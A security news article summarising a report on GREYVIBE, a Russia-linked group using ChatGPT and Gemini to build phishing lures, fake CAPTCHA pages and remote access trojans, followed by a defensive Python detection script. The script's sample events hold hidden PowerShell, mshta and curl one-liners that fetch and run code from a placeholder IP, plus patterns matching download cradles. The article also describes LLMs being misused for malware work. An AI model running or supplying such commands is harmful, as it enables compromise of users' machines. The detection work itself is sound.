GBHackers

GREYVIBE Threat Actors Use ChatGPT and Google Gemini to Scale Cyberattack Operations


Threat actors are increasingly turning to generative AI tools such as ChatGPT and Google Gemini to accelerate cyberattack operations, lowering technical barriers and reshaping modern threat landscapes.

A recent report by WithSecure highlights a Russia-linked threat group, tracked as GREYVIBE, that has systematically integrated large language models (LLMs) into its campaigns targeting Ukraine and related entities since August 2025.

Cyberattack Operations

GREYVIBE has conducted a wide range of multi-vector attacks, combining spear-phishing, fake CAPTCHA verification pages, and malicious websites to distribute malware.

The group’s phishing campaigns, known as PhantomMail, relied on malicious archive files hosted on services like Google Drive, tricking victims into executing loaders disguised as legitimate documents.

Another campaign, PhantomClick, used fake CAPTCHA pages that impersonated platforms such as Zoom to socially engineer users into executing malicious commands.

Example of a fake CAPTCHA site and the prompted instructions (Ukrainian) (Source: WithSecure Labs)

Meanwhile, the PrincessClub operation deployed fake adult-themed websites to lure victims, including Ukrainian military personnel, into downloading spyware and remote access tools.

The report reveals that GREYVIBE extensively uses AI tools, including ChatGPT, Google Gemini, and Ideogram AI, across the entire attack lifecycle. These technologies are leveraged to generate phishing lures, design malicious websites, develop obfuscated scripts, and even assist in malware creation.

This operational use of AI enables the group to rapidly build and modify attack infrastructure, reducing reliance on traditional, reusable malware patterns that defenders can more easily detect.

One notable example is LegionRelay, a custom PowerShell-based remote access trojan (RAT) believed to be partially developed with AI assistance.

Despite its relatively simple design, the malware enables attackers to execute commands, exfiltrate files, capture screenshots, and harvest sensitive data from applications like Telegram and WhatsApp. However, researchers identified design flaws in LegionRelay that exposed parts of its backend infrastructure, allowing deeper visibility into GREYVIBE’s operations.

In addition to LegionRelay, the group deploys PhantomRelay, another RAT that uses WebSocket communication and modular scripting to extend its capabilities post-compromise.

On mobile platforms, GREYVIBE uses FallSpy, an Android spyware that can collect contacts, call logs, location data, and device information. These tools are supported by custom obfuscators such as DAYLIGHT and TEASOUP, which help evade detection and analysis.

AI plays a critical role in enabling GREYVIBE to scale operations efficiently. By automating coding tasks, generating convincing social engineering content, and assisting in infrastructure setup, AI reduces the skill threshold required for complex cyber operations.

Examples of LLM markers present across images used by GREYVIBE (Source: WithSecure Labs)

This also complicates attribution and clustering: because AI-generated code and artifacts can vary significantly from one campaign to the next, detection and attribution methods that depend on code reuse (shared functions, strings, or file hashes) become less reliable, leaving behavioral signals, what the code does once it runs on a host, as the more durable indicator.

While its targeting aligns with Russian state interests, particularly intelligence gathering in the context of the Ukraine conflict, GREYVIBE exhibits characteristics of both state-sponsored and cybercriminal activity.

Evidence suggests the group operates in the Moscow time zone, uses Russian-language infrastructure, and may have ties to known cybercrime ecosystems such as TrickBot-linked clusters. This hybrid nature blurs the line between nation-state operations and organized cybercrime.

The emergence of AI-assisted threat groups like GREYVIBE signals a shift in cyber warfare, where automation and generative technologies enhance both speed and adaptability.

For defenders, this evolution presents new challenges, as attackers can rapidly iterate tactics and evade detection mechanisms. Organizations are advised to strengthen email filtering, monitor unusual command execution, and adopt behavior-based detection systems to counter increasingly AI-driven threats.
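As an added illustration of the "monitor unusual command execution" advice, and of the fake-CAPTCHA (PhantomClick-style) lures described earlier, the script below scores process-creation events for the pattern those lures produce: a command interpreter launched from the user's interactive shell with evasion flags or a fetch-and-run one-liner. This is example code written for this page, not WithSecure's tooling or anything recovered from GREYVIBE. It assumes Sysmon-style telemetry (parent image, image, command line), assumes the lure has the victim paste a command into the Run dialog or File Explorer so the parent process is explorer.exe (the page does not state how the commands are executed), and uses a hypothetical LOLBin list and scoring threshold. All event records and addresses are constructed.

```python
"""Detection sketch: command interpreters launched from a pasted fake-CAPTCHA lure.

Added example for this page (not WithSecure or GREYVIBE code). Assumes
Sysmon-style process-creation records and that the pasted command's parent
is explorer.exe (Run dialog / File Explorer); both are assumptions.
"""
import re
from dataclasses import dataclass

# Assumed: Win+R and File Explorer launch children under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Hypothetical list of living-off-the-land binaries worth scoring.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "certutil.exe", "curl.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line features typical of a pasted one-liner. Each hit adds to the score.
FEATURES = {
    "hidden_window":     re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "encoded_command":   re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass":     re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "download_cradle":   re.compile(r"(?:iwr|invoke-webrequest|downloadstring|downloadfile|"
                                    r"net\.webclient|curl\b|certutil.*-urlcache|mshta\s+https?://)", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url":        re.compile(r"https?://\S+", re.I),
}
# Evasion flags and fetch-and-run primitives weigh 2; a bare URL weighs 1.
STRONG = {"hidden_window", "encoded_command", "policy_bypass",
          "download_cradle", "invoke_expression"}
ALERT_THRESHOLD = 2  # assumed tuning value


@dataclass
class Finding:
    ts: str
    host: str
    image: str
    features: list
    score: int


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict):
    """Return a Finding if the event looks like a pasted-lure execution, else None."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    if parent not in INTERACTIVE_PARENTS or image not in LOLBINS:
        return None
    hits = [name for name, rx in FEATURES.items() if rx.search(ev["cmdline"])]
    score = sum(2 if h in STRONG else 1 for h in hits)
    if score < ALERT_THRESHOLD:
        return None  # e.g. a user simply opening PowerShell from Explorer
    return Finding(ev["ts"], ev["host"], image, hits, score)


def scan(events):
    """Run score_event over a sequence of records and keep the alerts."""
    return [f for f in map(score_event, events) if f is not None]


# Constructed sample records (not real telemetry); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"ts": "2025-09-02T10:14:03Z", "host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iwr https://203.0.113.5/v.ps1 | iex"'},
    {"ts": "2025-09-02T10:15:41Z", "host": "ws-22", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://203.0.113.5/c.hta"},
    {"ts": "2025-09-02T10:16:09Z", "host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},                       # benign: user opened a shell
    {"ts": "2025-09-02T10:20:00Z", "host": "ws-30", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ep bypass -File C:\scripts\backup.ps1"},  # scheduled task, not interactive
    {"ts": "2025-09-02T10:21:12Z", "host": "ws-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"ts": "2025-09-02T10:25:55Z", "host": "ws-22", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "curl -s https://203.0.113.5/a.txt -o %TEMP%\a.txt"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.image} score={f.score} {f.features}")
```

The parent-process gate is what keeps this behavioral rather than signature-based: the same PowerShell flags from a scheduled task or an IDE are scored zero, and the features are properties of how the command runs, not of any particular script, so a campaign that regenerates its loader with an LLM still trips the same rule.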
